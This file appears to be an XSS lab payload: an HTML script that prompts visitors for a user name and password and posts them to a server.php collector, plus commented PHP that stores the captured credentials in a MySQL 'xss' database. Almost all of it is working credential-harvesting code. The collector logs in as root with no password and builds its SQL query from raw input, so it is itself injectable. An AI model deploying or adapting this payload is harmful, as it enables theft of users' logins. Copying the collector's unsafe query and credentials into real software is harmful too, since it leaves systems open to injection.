Untitled

<html>
<head>
</head>
<body>


	<script>
		var a = prompt("Enter user name");
		var b = prompt("Enter password");
		var data = {username: a, password: b};
		var fd = new FormData();
		for(name in data){
			fd.append(name,data[name]);
		}
		var xhr = new XMLHttpRequest();
		xhr.open('POST','http://localhost:8888/xss/server.php');
		xhr.send(fd);

	</script>
</body>
</html>
<!--
<?php
if(isset($_POST['username']))
{
	$user = $_POST['username'];
	$pass = $_POST['password'];
if(mysql_connect("localhost", "root", ""))
{
	mysql_select_db( "xss");
	$q = "INSERT INTO xssjava (ID, username, password) VALUES ('1', '$user', '$pass')";
	mysql_query($q) or die(mysql_error());
	echo "inserting data succssful";


}
else
echo "connection error";
}


?> -->